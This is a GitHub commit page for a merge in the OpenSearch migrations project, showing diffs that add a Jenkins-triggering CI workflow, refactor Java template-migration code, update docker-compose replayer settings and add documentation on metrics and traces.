Skip to content

Commit

Permalink
Merge remote-tracking branch 'origin/main' into user-agent-console
Browse files Browse the repository at this point in the history
Signed-off-by: Tanner Lewis <[email protected]>
  • Loading branch information
lewijacn committed Sep 19, 2024
2 parents b488a73 + d2dce08 commit 352f23b
Show file tree
Hide file tree
Showing 49 changed files with 1,073 additions and 688 deletions.
40 changes: 40 additions & 0 deletions .github/workflows/rfs_pr_e2e_test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
name: Jenkins

on:
push:
branches-ignore:
- 'backport/**'
- 'dependabot/**'
pull_request_target:
types: [opened, synchronize, reopened]

env:
python-version: '3.11'

permissions:
contents: read # to fetch code (actions/checkout)

jobs:
rfs-e2e-aws-test:
runs-on: ubuntu-latest
steps:
- name: Determine Github repository and branch
id: determine-repo-vars
run: |
if [[ "${GITHUB_EVENT_NAME}" == "pull_request_target" ]]; then
branch_name="${{ github.event.pull_request.head.ref }}"
pr_repo_url="https://github.com/${{ github.event.pull_request.head.repo.full_name }}.git"
else
branch_name="${{ github.ref_name }}"
pr_repo_url="https://github.com/${{ github.repository }}.git"
fi
echo "Running jenkins test on repo: $pr_repo_url and branch: $branch_name"
echo "branch_name=$branch_name" >> $GITHUB_OUTPUT
echo "pr_repo_url=$pr_repo_url" >> $GITHUB_OUTPUT
- name: Jenkins Job Trigger and Monitor
uses: lewijacn/[email protected]
with:
jenkins_url: "https://migrations.ci.opensearch.org"
job_name: "rfs-default-e2e-test"
api_token: "${{ secrets.JENKINS_MIGRATIONS_GENERIC_WEBHOOK_TOKEN }}"
job_params: "GIT_REPO_URL=${{ steps.determine-repo-vars.outputs.pr_repo_url }},GIT_BRANCH=${{ steps.determine-repo-vars.outputs.branch_name }}"
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ public List<String> createLegacyTemplates(GlobalMetadataData_OS_2_11 metadata, M
return createTemplates(
metadata.getTemplates(),
legacyTemplateAllowlist,
TemplateTypes.LegacyIndexTemplate,
TemplateTypes.LEGACY_INDEX_TEMPLATE,
mode,
context
);
Expand All @@ -54,7 +54,7 @@ public List<String> createComponentTemplates(GlobalMetadataData_OS_2_11 metadata
return createTemplates(
metadata.getComponentTemplates(),
componentTemplateAllowlist,
TemplateTypes.ComponentTemplates,
TemplateTypes.COMPONENT_TEMPLATE,
mode,
context
);
Expand All @@ -64,27 +64,27 @@ public List<String> createIndexTemplates(GlobalMetadataData_OS_2_11 metadata, Mi
return createTemplates(
metadata.getIndexTemplates(),
indexTemplateAllowlist,
TemplateTypes.IndexTemplate,
TemplateTypes.INDEX_TEMPLATE,
mode,
context
);
}

@AllArgsConstructor
private enum TemplateTypes {
IndexTemplate(
(client, name, body, context) -> client.createIndexTemplate(name, body, context.createMigrateTemplateContext()),
(client, name) -> client.hasIndexTemplate(name)
INDEX_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createIndexTemplate(name, body, context.createMigrateTemplateContext()),
(targetClient, name) -> targetClient.hasIndexTemplate(name)
),

LegacyIndexTemplate(
(client, name, body, context) -> client.createLegacyTemplate(name, body, context.createMigrateLegacyTemplateContext()),
(client, name) -> client.hasLegacyTemplate(name)
LEGACY_INDEX_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createLegacyTemplate(name, body, context.createMigrateLegacyTemplateContext()),
(targetClient, name) -> targetClient.hasLegacyTemplate(name)
),

ComponentTemplates(
(client, name, body, context) -> client.createComponentTemplate(name, body, context.createComponentTemplateContext()),
(client, name) -> client.hasComponentTemplate(name)
COMPONENT_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createComponentTemplate(name, body, context.createComponentTemplateContext()),
(targetClient, name) -> targetClient.hasComponentTemplate(name)
);
final TemplateCreator creator;
final TemplateExistsCheck alreadyExistsCheck;
Expand Down Expand Up @@ -118,7 +118,7 @@ private List<String> createTemplates(
return List.of();
}

if (templateAllowlist != null && templateAllowlist.size() == 0) {
if (templateAllowlist != null && templateAllowlist.isEmpty()) {
log.info("No {} in specified allowlist", templateType);
return List.of();
} else if (templateAllowlist != null) {
Expand All @@ -144,24 +144,21 @@ private List<String> createTemplates(

templatesToCreate.forEach((templateName, templateBody) -> {
log.info("Creating {}: {}", templateType, templateName);
switch (mode) {
case SIMULATE:
var alreadyExists = templateType.alreadyExistsCheck.templateAlreadyExists(client, templateName);
if (!alreadyExists) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, it will not be created during a migration", templateName);
}
break;

case PERFORM:
var createdTemplate = templateType.creator.createTemplate(client, templateName, templateBody, context);
if (createdTemplate.isPresent()) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, unable to create", templateName);
}
break;

if (mode == MigrationMode.SIMULATE) {
var alreadyExists = templateType.alreadyExistsCheck.templateAlreadyExists(client, templateName);
if (!alreadyExists) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, it will not be created during a migration", templateName);
}
} else if (mode == MigrationMode.PERFORM) {
var createdTemplate = templateType.creator.createTemplate(client, templateName, templateBody, context);
if (createdTemplate.isPresent()) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, unable to create", templateName);
}
}
});

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -21,16 +21,18 @@ public ObjectNode getTemplates() {
}

public ObjectNode getIndexTemplates() {
if (root.get("index_template") != null) {
return (ObjectNode) root.get("index_template").get("index_template");
String indexTemplateKey = "index_template";
if (root.get(indexTemplateKey) != null) {
return (ObjectNode) root.get(indexTemplateKey).get(indexTemplateKey);
} else {
return null;
}
}

public ObjectNode getComponentTemplates() {
if (root.get("component_template") != null) {
return (ObjectNode) root.get("component_template").get("component_template");
String componentTemplateKey = "component_template";
if (root.get(componentTemplateKey) != null) {
return (ObjectNode) root.get(componentTemplateKey).get(componentTemplateKey);
} else {
return null;
}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -42,11 +42,10 @@ public boolean create(

// Create the index; it's fine if it already exists
try {
switch (mode) {
case SIMULATE:
return !client.hasIndex(index.getName());
case PERFORM:
return client.createIndex(index.getName(), body, context).isPresent();
if (mode == MigrationMode.SIMULATE) {
return !client.hasIndex(index.getName());
} else if (mode == MigrationMode.PERFORM) {
return client.createIndex(index.getName(), body, context).isPresent();
}
} catch (InvalidResponse invalidResponse) {
var illegalArguments = invalidResponse.getIllegalArguments();
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,8 @@ public JsonNode getAliases() {

@Override
public String getId() {
return indexName;
// The ID is the name in this case
return getName();
}

@Override
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -109,8 +109,7 @@ Mono<ObjectNode> getJsonForIndexApis(HttpResponse resp) {
var tree = (ObjectNode) objectMapper.readTree(resp.body);
return Mono.just(tree);
} catch (Exception e) {
log.error("Unable to get json response: ", e);
return Mono.error(new OperationFailed("Unable to get json response: " + e.getMessage(), resp));
return logAndReturnJsonError(e, resp);
}
}

Expand Down Expand Up @@ -140,8 +139,13 @@ Mono<ObjectNode> getJsonForTemplateApis(HttpResponse resp) {
}
return Mono.just(tree);
} catch (Exception e) {
log.error("Unable to get json response: ", e);
return Mono.error(new OperationFailed("Unable to get json response: " + e.getMessage(), resp));
return logAndReturnJsonError(e, resp);
}
}

Mono<ObjectNode> logAndReturnJsonError(Exception e, HttpResponse resp) {
String errorPrefix = "Unable to get json response: ";
log.atError().setCause(e).setMessage(errorPrefix).log();
return Mono.error(new OperationFailed(errorPrefix + e.getMessage(), resp));
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -124,10 +124,10 @@ private CodedOutputStreamHolder getOrCreateCodedOutputStreamHolder() throws IOEx
} else {
currentCodedOutputStreamHolderOrNull = streamManager.createStream();
var currentCodedOutputStream = currentCodedOutputStreamHolderOrNull.getOutputStream();
// e.g. 1: "9a25a4fffe620014-00034cfa-00000001-d208faac76346d02-864e38e2"
// e.g. <pre> 1: "9a25a4fffe620014-00034cfa-00000001-d208faac76346d02-864e38e2" </pre>
currentCodedOutputStream.writeString(TrafficStream.CONNECTIONID_FIELD_NUMBER, connectionIdString);
if (nodeIdString != null) {
// e.g. 5: "5ae27fca-0ac4-11ee-be56-0242ac120002"
// e.g. <pre> 5: "5ae27fca-0ac4-11ee-be56-0242ac120002" </pre>
currentCodedOutputStream.writeString(TrafficStream.NODEID_FIELD_NUMBER, nodeIdString);
}
if (eomsSoFar > 0) {
Expand Down Expand Up @@ -213,11 +213,11 @@ private void beginSubstreamObservation(
numFlushesSoFar + 1
)
);
// e.g. 2 {
// e.g. <pre> 2 { </pre>
writeTrafficStreamTag(TrafficStream.SUBSTREAM_FIELD_NUMBER);
// Write observation content length
getOrCreateCodedOutputStream().writeUInt32NoTag(observationContentSize);
// e.g. 1 { 1: 1234 2: 1234 }
// e.g. <pre> 1 { 1: 1234 2: 1234 } </pre>
writeTimestampForNowToCurrentStream(timestamp);
}

Expand Down Expand Up @@ -371,7 +371,7 @@ private void addStringMessage(int captureFieldNumber, int dataFieldNumber, Insta
lengthSize = CodedOutputStream.computeInt32SizeNoTag(dataSize);
}
beginSubstreamObservation(timestamp, captureFieldNumber, dataSize + lengthSize);
// e.g. 4 {
// e.g. <pre> 4 { </pre>
writeObservationTag(captureFieldNumber);
if (dataSize > 0) {
getOrCreateCodedOutputStream().writeInt32NoTag(dataSize);
Expand Down Expand Up @@ -461,7 +461,7 @@ private void addSubstreamMessage(
captureClosureLength = CodedOutputStream.computeInt32SizeNoTag(dataSize + segmentCountSize);
}
beginSubstreamObservation(timestamp, captureFieldNumber, captureClosureLength + dataSize + segmentCountSize);
// e.g. 4 {
// e.g. <pre> 4 { </pre>
writeObservationTag(captureFieldNumber);
if (dataSize > 0) {
// Write size of data after capture tag
Expand Down Expand Up @@ -578,7 +578,7 @@ private void writeEndOfHttpMessage(Instant timestamp) throws IOException {
);
int eomDataSize = eomPairSize + CodedOutputStream.computeInt32SizeNoTag(eomPairSize);
beginSubstreamObservation(timestamp, TrafficObservation.ENDOFMESSAGEINDICATOR_FIELD_NUMBER, eomDataSize);
// e.g. 15 {
// e.g. <pre> 15 { </pre>
writeObservationTag(TrafficObservation.ENDOFMESSAGEINDICATOR_FIELD_NUMBER);
getOrCreateCodedOutputStream().writeUInt32NoTag(eomPairSize);
getOrCreateCodedOutputStream().writeInt32(
Expand Down Expand Up @@ -650,6 +650,8 @@ public boolean isOpen() {
}

@Override
public void close() {}
public void close() {
// No resources to close
}
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -78,7 +78,7 @@ services:
condition: service_started
opensearchtarget:
condition: service_started
command: /bin/sh -c "/runJavaWithClasspath.sh org.opensearch.migrations.replay.TrafficReplayer --speedup-factor 2 https://opensearchtarget:9200 --auth-header-value Basic\\ YWRtaW46bXlTdHJvbmdQYXNzd29yZDEyMyE= --insecure --kafka-traffic-brokers kafka:9092 --kafka-traffic-topic logging-traffic-topic --kafka-traffic-group-id logging-group-default --otelCollectorEndpoint http://otel-collector:4317"
command: /bin/sh -c "/runJavaWithClasspath.sh org.opensearch.migrations.replay.TrafficReplayer --speedup-factor 2 https://opensearchtarget:9200 --auth-header-value Basic\\ YWRtaW46bXlTdHJvbmdQYXNzd29yZDEyMyE= --insecure --kafka-traffic-brokers kafka:9092 --kafka-traffic-topic logging-traffic-topic --kafka-traffic-group-id logging-group-default --otelCollectorEndpoint http://otel-collector:4317" #--transformer-config-base64 W3sgIkpzb25Kb2x0VHJhbnNmb3JtZXJQcm92aWRlciI6ClsKICB7CiAgICAic2NyaXB0IjogewogICAgICAib3BlcmF0aW9uIjogInNoaWZ0IiwKICAgICAgInNwZWMiOiB7CiAgICAgICAgIm1ldGhvZCI6ICJtZXRob2QiLAogICAgICAgICJVUkkiOiAiVVJJIiwKICAgICAgICAiaGVhZGVycyI6ICJoZWFkZXJzIiwKICAgICAgICAicGF5bG9hZCI6IHsKICAgICAgICAgICJpbmxpbmVkSnNvbkJvZHkiOiB7CiAgICAgICAgICAgICJ0b3AiOiB7CiAgICAgICAgICAgICAgInRhZ1RvRXhjaXNlIjogewogICAgICAgICAgICAgICAgIioiOiAicGF5bG9hZC5pbmxpbmVkSnNvbkJvZHkudG9wLiYiIAogICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgIioiOiAicGF5bG9hZC5pbmxpbmVkSnNvbkJvZHkudG9wLiYiCiAgICAgICAgICAgIH0sCiAgICAgICAgICAiKiI6ICJwYXlsb2FkLmlubGluZWRKc29uQm9keS4mIgogICAgICAgICAgfQogICAgICAgIH0KICAgICAgfQogICAgfQogIH0sIAogewogICAic2NyaXB0IjogewogICAgICJvcGVyYXRpb24iOiAibW9kaWZ5LW92ZXJ3cml0ZS1iZXRhIiwKICAgICAic3BlYyI6IHsKICAgICAgICJVUkkiOiAiPXNwbGl0KCcvZXh0cmFUaGluZ1RvUmVtb3ZlJyxAKDEsJikpIgogICAgIH0KICB9CiB9LAogewogICAic2NyaXB0IjogewogICAgICJvcGVyYXRpb24iOiAibW9kaWZ5LW92ZXJ3cml0ZS1iZXRhIiwKICAgICAic3BlYyI6IHsKICAgICAgICJVUkkiOiAiPWpvaW4oJycsQCgxLCYpKSIKICAgICB9CiAgfQogfQpdCn1dCg=="

opensearchtarget:
image: 'opensearchproject/opensearch:2.15.0'
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
## Monitoring Progress via Instrumentation

The replayer and capture proxy (if started with the `--otelCollectorEndpoint` argument) emit metrics through an
otel-collector endpoint, which is deployed within Migrations Assistant tasks as a sidecar container. The
otel-collectors will publish metrics and traces to Amazon CloudWatch and AWS X-Ray.

Some of these metrics will show simple progress, such as bytes or records transmitted. Other records can show higher
level information, such the number of responses with status codes that match vs those that don't. To observe those,
search for `statusCodesMatch` in the CloudWatch Console. That's emitted as an attribute along with the method and
the source/target status code (rounded down to the last hundred; i.e. a status code of 201 has a 200 attribute).

Other metrics will show latencies, the number of requests, unique connections at a time and more. Low-level and
high-level metrics are being improved and added. For the latest information, see the
[README.md](../../../../../../coreUtilities/README.md).

Along with metrics, traces are emitted by the replayer and the proxy (when proxy is run with metrics enabled, e.g. by
launching with --otelCollectorEndpoint set to the otel-collector sidecar). Traces will include very granular data for
each connection, including how long the TCP connections are open, how long the source and target clusters took to send
a response, as well as other internal details that can explain the progress of each request.

Notice that traces for the replayer will show connections and Kafka records open, in some cases, much longer than their
representative HTTP transactions. This is because records are considered 'active' to the replayer until they are
committed and records are only committed once _all_ previous records have also been committed. Details such as that
are defensive for when further diagnosis is necessary.
Original file line number Diff line number Diff line change
@@ -1,11 +1,13 @@
package org.opensearch.migrations.trafficcapture.proxyserver.testcontainers;

import org.opensearch.migrations.testutils.SharedDockerImageNames;

import org.testcontainers.containers.GenericContainer;

public class HttpdContainerTestBase extends TestContainerTestBase<GenericContainer<?>> {

private static final GenericContainer<?> httpd = new GenericContainer("httpd:alpine").withExposedPorts(80); // Container
// Port
private static final GenericContainer<?> httpd = new GenericContainer(SharedDockerImageNames.HTTPD)
.withExposedPorts(80); // Container Port

public GenericContainer<?> getContainer() {
return httpd;
Expand Down
Original file line number Diff line number Diff line change
@@ -1,13 +1,12 @@
package org.opensearch.migrations.trafficcapture.proxyserver.testcontainers;

import org.opensearch.migrations.testutils.SharedDockerImageNames;

import org.testcontainers.containers.KafkaContainer;
import org.testcontainers.utility.DockerImageName;

public class KafkaContainerTestBase extends TestContainerTestBase<KafkaContainer> {

private static final KafkaContainer kafka = new KafkaContainer(
DockerImageName.parse("confluentinc/cp-kafka:latest")
);
private static final KafkaContainer kafka = new KafkaContainer(SharedDockerImageNames.KAFKA);

public KafkaContainer getContainer() {
return kafka;
Expand Down
Loading

0 comments on commit 352f23b

Please sign in to comment.